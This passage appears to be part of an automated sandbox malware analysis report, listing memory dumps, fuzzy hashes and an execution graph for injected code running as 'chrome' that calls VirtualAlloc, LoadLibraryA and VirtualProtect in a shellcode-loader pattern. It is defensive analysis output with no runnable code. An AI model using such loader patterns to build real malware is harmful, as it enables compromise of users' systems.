                                                    • Instruction Fuzzy Hash: 4A81D475A0061AAFCB40CF9CC984A9EBBF5FF58314B198191E948EB352D730ED51CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1811922332.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_53a0000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction ID: 09bfccb08a244911d4d2ded2f103f7e881800095513cc6fb785c8ba2bacec7ea
                                                    • Opcode Fuzzy Hash: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction Fuzzy Hash: 3181D176A0060AAFCB44CF9CC888E9EB7F5FF48210B1582A5E958EB351D770ED51CB90

                                                    Execution Graph

                                                    Execution Coverage:53.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:7
                                                    Total number of Limit Nodes:0
                                                    execution_graph 78 d20000 VirtualAlloc 79 d2003e VirtualAlloc 78->79 81 d20056 78->81 79->81 80 d200d4 LoadLibraryA 80->81 81->80 83 d2014a 81->83 82 d201fe 83->82 84 d201e7 VirtualProtect 83->84 84->82 84->83

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D20035
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D20051
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 00D200E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 00D201F5
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4125887271.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_d20000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Alloc$LibraryLoadProtect
                                                    • String ID:
                                                    • API String ID: 515352489-0
                                                    • Opcode ID: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction ID: 7b77381182cfbea2872da5ce0247595fb093257631fcabbedd6377e33cdd7f6c
                                                    • Opcode Fuzzy Hash: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction Fuzzy Hash: 4A81D475A0061AAFCB40CF9CC984A9EBBF5FF58314B198191E948EB352D730ED51CBA4